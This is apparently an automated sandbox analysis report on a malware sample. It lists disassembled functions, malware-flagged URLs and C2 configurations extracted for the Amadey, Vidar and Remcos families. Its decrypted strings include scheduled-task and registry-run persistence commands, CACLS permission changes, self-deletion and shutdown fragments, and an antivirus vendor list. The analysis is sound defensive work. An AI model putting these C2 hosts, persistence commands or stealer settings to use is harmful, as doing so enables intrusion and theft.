Function 61E541A0 Relevance: 6.8, APIs: 2, Strings: 2, Instructions: 772stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 61E541DC
strcmp.MSVCRT ref: 61E543C4

Part of subcall function 61E0AE03: free.MSVCRT ref: 61E0AE3D

Strings

rnal, xrefs: 61E547EC
@, xrefs: 61E54291

Memory Dump Source

Source File: 00000003.00000002.910580394.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.910576218.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910593168.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910629670.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910635803.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910647357.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910647357.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910673455.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_yaALNupJCH.jbxd

Similarity

API ID: strcmp$free
String ID: @$rnal
API String ID: 3401341699-826727331
Opcode ID: 5a4379d4cfcf7d0586910c9dd162a297998cc0b494d94bc9188d3a75191f83d4
Instruction ID: 0ce42be2a52064457b78e7c31244c3f07411abd0ae8e299ce13c5538bbb98839
Opcode Fuzzy Hash: 5a4379d4cfcf7d0586910c9dd162a297998cc0b494d94bc9188d3a75191f83d4
Instruction Fuzzy Hash: 70822470A04259CFEB60CF68C880B89BBF1BF45308F2481EAD8589B352E775D9A5CF51

Uniqueness

Uniqueness Score: -1.00%

Function 61E4928D Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 309fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 61E4947D

Strings

winOpen, xrefs: 61E49605

Memory Dump Source

Source File: 00000003.00000002.910580394.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.910576218.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910593168.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910629670.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910635803.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910647357.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910647357.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910673455.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_yaALNupJCH.jbxd

Similarity

API ID: CreateFile
String ID: winOpen
API String ID: 823142352-2556188131
Opcode ID: 05e922388839dc4f4ca0a419fa8aad4fac10a301f76b51f4e0cfaabc36faa4c0
Instruction ID: ddd978882cd5270fa8f94071a9300b4b805ea89cb158bd2aa8a7dfbc70792811
Opcode Fuzzy Hash: 05e922388839dc4f4ca0a419fa8aad4fac10a301f76b51f4e0cfaabc36faa4c0
Instruction Fuzzy Hash: B4D1A2709047499FDB10DFA9D58478EBBF0AF88318F208929E868EB394E774D985CF41

Uniqueness

Uniqueness Score: -1.00%

Function 61E33F01 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 61E33FB1

Strings

winRead, xrefs: 61E33FF4

Memory Dump Source

Source File: 00000003.00000002.910580394.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.910576218.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910593168.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910629670.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910635803.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910647357.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910647357.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910673455.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_yaALNupJCH.jbxd

Similarity

API ID: FileRead
String ID: winRead
API String ID: 2738559852-2759563040
Opcode ID: 851fea00ae6f1ba7616ac175e32ee1177d3feb74bace6ba213d978081e29e1e5
Instruction ID: 0463a8294cdaeeb391ba6f45b5ad466d8cdf6662135ec028d0205bc88dba3c8e
Opcode Fuzzy Hash: 851fea00ae6f1ba7616ac175e32ee1177d3feb74bace6ba213d978081e29e1e5
Instruction Fuzzy Hash: 2041E475A052699BCF04CFA8D88498EBBF2FF88314F618529E868A7354D730E941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0041A047 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 0041A069

Strings

Unknown, xrefs: 0041A07B

Memory Dump Source

Source File: 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.907271529.000000000045B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.907271529.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CurrentProfile
String ID: Unknown
API String ID: 2104809126-1654365787
Opcode ID: 91ff28df61aea0c9bc6746e415b7bab10b144e6e939911b80896583abb12f046
Instruction ID: 1ee76d63224a9dd6e6d9f6b0b3bb8525638a5972ea7dea0bfefb8eb3b52febb6
Opcode Fuzzy Hash: 91ff28df61aea0c9bc6746e415b7bab10b144e6e939911b80896583abb12f046
Instruction Fuzzy Hash: 16F0A731A0111DD7CB10DFA5CC05BDE77B8BB09348F10402AA941E3280DB78E904CB99

Uniqueness

Uniqueness Score: -1.00%

Function 61E2A652 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 61E2A66D

Memory Dump Source

Source File: 00000003.00000002.910580394.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.910576218.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910593168.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910629670.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910635803.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910647357.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910647357.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910673455.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_yaALNupJCH.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: e26b6afafbe88dd408296985b2cf5437b863de116ceff75567ad09f3e2b45908
Instruction ID: 4040ac9b910eb7d7724dfc403353a0a40a3fe088e4c24dccbd46c39564703f2d
Opcode Fuzzy Hash: e26b6afafbe88dd408296985b2cf5437b863de116ceff75567ad09f3e2b45908
Instruction Fuzzy Hash: C3F0F97180530A9FDB109F55C58195DFBE8EF84268F14C86DE8984B310D374E544CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0042B0C7 Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,00431FC3,0045C730,00000314,00000000,?,?,?,?,?,0042A052,0045C730,Microsoft Visual C++ Runtime Library,00012010), ref: 0042B0C9

Memory Dump Source

Source File: 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.907271529.000000000045B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.907271529.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 267bccce97fb01b67052af936aa1ccedfcd33808fb09cd48dbd23cffd6ad54e1
Instruction ID: 38b7c258edfd2edc927cf7725bc0d3b843642b96c42c3ebaacbadf1941e180c6
Opcode Fuzzy Hash: 267bccce97fb01b67052af936aa1ccedfcd33808fb09cd48dbd23cffd6ad54e1
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 61E0AE03 Relevance: 1.3, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 61E0AE3D

Memory Dump Source

Source File: 00000003.00000002.910580394.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.910576218.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910593168.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910629670.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910635803.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910647357.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910647357.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910673455.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_yaALNupJCH.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 515cd9b0cc975ca03c008dfe43f6ff5eb83953987e78c9cd7cdb726aa12e4eb5
Instruction ID: a929929d55870eb2e3dfc3d9b08de53e37bb6c9da6c43a06ed963554b33c57a4
Opcode Fuzzy Hash: 515cd9b0cc975ca03c008dfe43f6ff5eb83953987e78c9cd7cdb726aa12e4eb5
Instruction Fuzzy Hash: A5F090B1554708CFDB006FA8E8C52153BA4F746219F5840BAE8150B201D735D5E1CB91

Uniqueness

Uniqueness Score: -1.00%

Function 61E2A6AF Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 61E2A6BF

Memory Dump Source

Source File: 00000003.00000002.910580394.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.910576218.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910593168.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910629670.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910635803.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910647357.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910647357.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910673455.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_yaALNupJCH.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 1f2356de957b5852e51c4f16dd739168b253dd6d2aac726755fb4680bcc79cb1
Instruction ID: 08a60fc229ca929b4850671bf03eed3452f9cad2ea52f9bb94d0a5c68b8f0e05
Opcode Fuzzy Hash: 1f2356de957b5852e51c4f16dd739168b253dd6d2aac726755fb4680bcc79cb1
Instruction Fuzzy Hash: 68F039B0C4830A9FCB009FA5DAC5A0DBBE8EB84258F14C46DE8988F710D334E580CB51

Uniqueness

Uniqueness Score: -1.00%

Source: http://transdi.org/host.exe3jd/index.php0c	Avira URL Cloud: Label: malware
Source: http://transdi.org/host.exeZ	Avira URL Cloud: Label: malware
Source: http://transdi.org/host.exe8	Avira URL Cloud: Label: malware
Source: http://transdi.org/host.exe5	Avira URL Cloud: Label: malware
Source: http://transdi.org/svchost.dll	Avira URL Cloud: Label: malware
Source: http://transdi.org/host.exe	Avira URL Cloud: Label: malware
Source: http://transdi.org/host.exe=o	Avira URL Cloud: Label: malware

Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00433785 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	2_2_00433785
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_004096F5 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,_memset,CryptBinaryToStringA,	3_2_004096F5
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_0041195E CryptUnprotectData,LocalAlloc,_memmove,LocalFree,	3_2_0041195E
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_00411733 _memset,lstrlenA,CryptStringToBinaryA,_memmove,lstrcat,lstrcat,	3_2_00411733
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_004118FB CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_004118FB
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_00411A77 _malloc,_memmove,_malloc,CryptUnprotectData,_memmove,	3_2_00411A77

Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199555780195
Source: Malware configuration extractor	URLs: https://t.me/solonichat
Source: Malware configuration extractor	URLs: mardukoff.info/g9ecOb3jd/index.php
Source: Malware configuration extractor	URLs: 81.19.131.36

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exe	Avira: detection malicious, Label: TR/AD.GenSteal.aekjv
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe	Avira: detection malicious, Label: BDS/Backdoor.Gen

Source: yaALNupJCH.exe	Malware Configuration Extractor: Amadey {"C2 url": "mardukoff.info/g9ecOb3jd/index.php", "Version": "3.89"}
Source: 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199555780195", "https://t.me/solonichat"], "Botnet": "40eaa63b296d256c2181f079611d421f", "Version": "5.8"}
Source: 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Remcos {"Host:Port:Password": "81.19.131.36:2450:0", "Assigned name": "dfg", "Copy file": "remcos.exe", "Mutex": "dh-A9HL6N", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\svchost[1].dll	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll	ReversingLabs: Detection: 52%

Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: 95.141.41.12
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: /n9kd3X/index.php
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: mardukoff.info
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: /g9ecOb3jd/index.php
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: 3.89
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: S-%lu-
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: %-lu
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: -%lu
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: 8e8f2ea80a
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: nhdues.exe
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: SCHTASKS
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: /Create /SC MINUTE /MO 1 /TN
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: /TR "
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: " /F
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: Startup
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: cmd /C RMDIR /s/q
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: rundll32
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: /Delete /TN "
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: Programs
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: %USERPROFILE%
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: \App
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: POST
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: &vs=
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: &sd=
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: &os=
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: &bi=
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: &ar=
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: &pc=
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: &un=
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: &dm=
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: &av=
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: &lv=
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: &og=
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: cred.dll\|clip.dll\|
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: Main
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: http://
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: https://
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: Plugins/
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: &unit=
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: shell32.dll
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: kernel32.dll
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: GetNativeSystemInfo
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: ProgramData\
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: AVAST Software
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: Avira
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: Kaspersky Lab
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: ESET
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: Panda Security
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: Doctor Web
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: 360TotalSecurity
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: Bitdefender
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: Norton
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: Sophos
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: Comodo
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: WinDefender
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: 0123456789
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: ------
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: ?scr=1
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: .jpg
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: ComputerName
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: -unicode-
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: VideoID
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: \0000
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: DefaultSettings.XResolution
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: DefaultSettings.YResolution
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: ProductName
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: 2019
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: 2022
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: 2016
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: CurrentBuild
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: echo Y\|CACLS "
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: " /P "
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: CACLS "
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: :R" /E
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: :F" /E
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: &&Exit
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: rundll32.exe
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: "taskkill /f /im "
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: " && timeout 1 && del
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: && Exit"
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: " && ren
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: &&
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: Powershell.exe
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: -executionpolicy remotesigned -File "
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: shutdown -s -t 0
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: jg"
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: G
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: 9]
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: nx/
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: !
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: ~[
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: /-8'
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: LNS@
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: "us+
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: "rd+
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: "ns+
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: "ai+
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: "`r+
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: "\|c+
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: "tn+
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: "cm+
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: "`v+
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: "kv+
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: "ng+
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: ARE@
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: *ipP
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: .<1'
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: .<1"
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: C
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack	String decryptor: 5V

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\svchost[1].dll	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe	Joe Sandbox ML: detected

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

